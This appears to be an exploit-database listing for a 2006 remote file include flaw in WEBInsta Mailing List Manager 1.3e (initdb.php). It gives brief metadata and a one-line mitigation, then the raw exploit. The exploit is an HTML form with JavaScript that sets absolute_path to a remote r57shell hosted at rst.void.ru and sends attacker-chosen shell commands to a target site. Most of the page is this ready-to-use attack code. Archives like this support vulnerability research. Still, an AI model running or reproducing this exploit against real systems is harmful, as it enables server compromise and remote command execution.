header-logo
Suggest Exploit
vendor:
Mailing List Manager
by:
str0ke
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Mailing List Manager
Affected Version From: 1.3e
Affected Version To: 1.3e
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WEBInsta Mailing List Manager <= 1.3e (initdb.php) Remote File Include Exploit

The vulnerable code snippet does not stop post requests to the absolute_path variable, allowing an attacker to inject malicious code into the application. An attacker can use a r57shell with a twist to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.
Source

Exploit-DB raw data:

<!--
vulnerable code: /maillist/inc/initdb.php
-----------------------------------------------------------------------
if(isset($_GET['absolute_path']))
 {
echo "no access from here !!";
exit;
}

include($absolute_path.'inc/adodbt/db.inc');
-----------------------------------------------------------------------
The above snippet does not stop post requests to the absolute_path variable.

A r57shell with a twist.

o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.31 ]---o

/str0ke ! milw0rm.com
-->

<head>
<title>WEBInsta Mailing List Manager &lt;= 1.3e (initdb.php) Remote File Include Exploit</title>
</head>
<script language="JavaScript">
function milw0rm() {
  if (document.exploit.target.value=="") {
    alert("Enter a Target");
    return false;
  }

  exploit.action= document.exploit.target.value;
  exploit.cmd.value=document.exploit.cmd.value;
  exploit.dir.value=document.exploit.dir.value;
  exploit.submit();
}
</script>
<body>
<form name="exploit" target="exploitframe" method="post" onSubmit="milw0rm();">
  <table width="975" border="0">
    <tr>
      <td width="961" align="left" valign="top" nowrap="nowrap"><strong>WEBInsta Mailing List Manager &lt;= 1.3e (initdb.php) Remote File Include Exploit</strong></td>

    </tr>
    <tr>
      <td><em>
        <input type="hidden" name="absolute_path" value="http://rst.void.ru/download/r57shell.txt?&" />
        </em><strong>*</strong><em>target</em>
        <input name="target" type="text" value="http://www.site.com/maillist/inc/initdb.php" size="50" maxlength="150" />
        <strong> *</strong><em>cmd</em>

        <input name="cmd" type="text" value="ls -la">
        <strong>*</strong><em>dir</em>
        <input name="dir" type="text" value=".">
        <em>
        <input type="submit" name="Submit" value="Exploit" />
        </em></td>
    </tr>
  </table>

  <p>
    <iframe name="exploitframe" height="410" width="1100" scrolling="yes" frameborder="0"></iframe>
  </p>
</form>
</body>
</html>

# milw0rm.com [2006-08-15]

Navigation

Suggest Exploit

Services By CQR